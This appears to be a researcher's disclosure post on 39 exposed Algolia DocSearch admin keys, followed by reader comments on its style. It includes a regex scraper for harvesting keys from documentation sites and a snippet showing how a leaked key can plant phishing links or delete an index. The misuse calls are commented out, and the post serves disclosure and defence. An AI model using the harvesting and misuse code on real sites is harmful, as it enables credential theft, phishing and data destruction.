I'm not a newspaper editor, but I think if this were an article for one, they'd also say the graphs are unnecessary. It smells of "I need some visual stuff to make this text interesting"...
Especially on night mode themes.
Besides, can we read anymore? In the age of "GPT, summarise it for me" attention spans, when glib commentary unrelated to the article's actual content is all many people have to add, perhaps liberal application of visualisations adds digestive value.
"If the secrets issuer partners with X-corp for secret scanning so that secrets get invalidated when you X them, then when you X them the secrets will be invalidated".
The above is a true statement for all X.
Unfortunately, it doesn't look like Algolia has implemented this.
The poster is 16, he can take it as feedback towards effective writing. Or the intellectual HN crowd can just downvote it and dissuade me from contributing and helping a kid (oh look at me, how fucking noble am I, right?).
Ah, that feeling of "Am I the only one who gets it around here?". I wanted to explain to you why graph 2 is dumb, and why graph 1 conveys very little information, but heck, I felt dissuaded.
In formal logic, that statement is true whether X is GitHub, Lockheed-Martin, Safeway, or the local hardware store.
In English, the statement serves to inform (or remind) you that GitHub has a secret scanning program that many providers actually do partner with.
If you want to help, you should sound helpful.
Posts with just text are dense and just not nice to read. That's why even text-only blog posts have a tendency to include a loosely-related image at the top, to catch the reader's eye.
Not saying people shouldn't build these tools, but the use case is lost on me.
It feels like the industry is in this weird phase of trying to replace 30-year-old, perfectly optimized shell utilities with multi-shot agent workflows that literally cost money to run. A basic Python script with a regex matcher and the GitHub API will find these keys faster, cheaper, and more reliably.
Of course, if the goal is just to be right rather than to convince someone else of what's right, then how you say something doesn't matter. But at that point you had already reached the goal before you started talking to them, so it's worth reexamining what you're actually looking to get out of the conversation.
Last October I reported an exposed Algolia admin API key on vuejs.org. The key had full permissions: addObject, deleteObject, deleteIndex, editSettings, the works. Vue acknowledged it, added me to their Security Hall of Fame, and rotated the key.
That should have been the end of it. But it got me thinking: if Vue.js had this problem, how many other DocSearch sites do too?
Turns out, a lot.
Algolia's DocSearch is a free search service for open source docs. They crawl your site, index it, and give you an API key to embed in your frontend. That key is supposed to be search-only, but some ship with full admin permissions.
Most keys came from frontend scraping. Algolia maintains a public (now archived) repo called docsearch-configs with a config for every site in the DocSearch program, over 3,500 of them. I used that as a starting target list and scraped roughly 15,000 documentation sites for embedded credentials. This catches keys that don't exist in any repo because they're injected at build time and only appear in the deployed site:
import re

# Pre-filter so only text that mentions Algolia at all gets scanned
ALGOLIA_RE = re.compile(r'algolia', re.IGNORECASE)
APP_RE = re.compile(r'["\']([A-Z0-9]{10})["\']')  # app IDs: 10 uppercase alphanumerics
KEY_RE = re.compile(r'["\']([\da-f]{32})["\']')   # API keys: 32 hex chars

def valid_app(candidate):
    # simple heuristic: drop all-digit matches (timestamps, hashes)
    return not candidate.isdigit()

def extract(text, app_ids, api_keys):
    if not ALGOLIA_RE.search(text):
        return
    for a in APP_RE.findall(text):
        if valid_app(a):
            app_ids.add(a)
    api_keys.update(KEY_RE.findall(text))
On top of that I ran GitHub code search to find keys in doc framework configs, then cloned and ran TruffleHog on 500+ documentation site repos to catch keys that had been committed and later removed.
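The git-history pass can be sketched roughly like this. The `trufflehog git <url> --json` invocation and the `DetectorName`/`Raw` fields match TruffleHog v3's JSON-lines output as I understand it, but treat the exact flags and field names as assumptions, not a definitive implementation:

```python
import json
import subprocess

def algolia_hits(json_lines):
    # TruffleHog emits one JSON object per finding; keep Algolia detector hits
    hits = []
    for line in json_lines.splitlines():
        if not line.strip():
            continue
        finding = json.loads(line)
        if finding.get("DetectorName") == "Algolia":
            hits.append(finding.get("Raw"))
    return hits

def scan_repo(repo_url):
    # assumed CLI shape: scan a repo's full git history for secrets
    out = subprocess.run(
        ["trufflehog", "git", repo_url, "--json"],
        capture_output=True, text=True,
    ).stdout
    return algolia_hits(out)
```

Running this over each repo in the target list catches keys that were committed once and "removed" later, since git history keeps them forever.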

In total, 39 admin keys turned out to be exposed. 35 of them came from frontend scraping alone; the remaining 4 were found through git history. Every single one was active at the time of discovery.
The affected list includes some massive open source projects.

Home Assistant alone has 85,000 GitHub stars and millions of active installations. KEDA is a CNCF project used in production Kubernetes clusters. vcluster, also Kubernetes infrastructure, had the largest search index of any affected site at over 100,000 records.

Nearly all 39 keys share the same permission set: search, addObject, deleteObject, deleteIndex, editSettings, listIndexes, and browse. A few have even broader access including analytics, logs, and NLU capabilities.
In practical terms, anyone with one of these keys can poison a project's search results with malicious links, redirect users to phishing pages, or simply delete the entire index and wipe out search for the site completely.
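To make the severity concrete, here is a minimal sketch of what those permissions translate to against Algolia's REST API (PUT to add or replace a record, DELETE to drop an index). The app ID, key, and index name are placeholders, and the destructive calls are deliberately left commented out:

```python
import json
import urllib.request

APP_ID = "EXAMPLEAPP"            # placeholder application ID
LEAKED_KEY = "leaked-admin-key"  # placeholder leaked admin key

def endpoint(path):
    # Algolia's write API lives under https://{app-id}.algolia.net
    return f"https://{APP_ID}.algolia.net{path}"

def algolia_call(method, path, body=None):
    # one authenticated REST call using the leaked credentials
    req = urllib.request.Request(
        endpoint(path),
        data=json.dumps(body).encode() if body is not None else None,
        headers={
            "X-Algolia-Application-Id": APP_ID,
            "X-Algolia-API-Key": LEAKED_KEY,
            "Content-Type": "application/json",
        },
        method=method,
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

# addObject: plant a search record whose link points at a phishing page
# algolia_call("PUT", "/1/indexes/docs/poisoned-1",
#              {"title": "Installation guide", "url": "https://phish.example/"})

# deleteIndex: erase the site's entire search index in one request
# algolia_call("DELETE", "/1/indexes/docs")
```

One HTTP request per action, no authentication beyond the key itself.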
SUSE/Rancher acknowledged the report within two days and rotated the key. That key is now fully revoked. Home Assistant also responded and began remediation, though the original key remains active.
I compiled the full list of affected keys and emailed Algolia directly a few weeks ago. No response. As of today, all remaining keys are still active.
This isn't really about 39 individual misconfigurations. Algolia's DocSearch program provides search-only keys, but many sites run their own crawler and end up using their write or admin key in the frontend config instead. Algolia's own docs warn against this, but it clearly happens at scale.
The fix is straightforward: if you're running DocSearch, check what key is in your frontend config and make sure it's search-only. If I found 39 admin keys with a few scripts, the real number is almost certainly higher.
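A quick way to audit your own site: Algolia exposes a key's permissions at GET /1/keys/{key}, and in my experience a key can be used to look up its own record (secret scanners rely on the same trick). Treat the self-lookup and the host name as assumptions; the ACL names below are the ones listed earlier in this post:

```python
import json
import urllib.request

# any of these on a frontend key means trouble
WRITE_ACLS = {"addObject", "deleteObject", "deleteIndex", "editSettings"}

def is_search_only(acl):
    # a key embedded in a frontend should hold no write/admin permissions
    return not WRITE_ACLS.intersection(acl)

def key_acl(app_id, api_key):
    # ask Algolia what this key is allowed to do, authenticating with the key itself
    req = urllib.request.Request(
        f"https://{app_id}.algolia.net/1/keys/{api_key}",
        headers={
            "X-Algolia-Application-Id": app_id,
            "X-Algolia-API-Key": api_key,
        },
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp).get("acl", [])

# Example: is_search_only(key_acl("YOURAPPID", "key-from-your-frontend-config"))
```

If that returns False for the key in your docs config, rotate it and generate a search-only key instead.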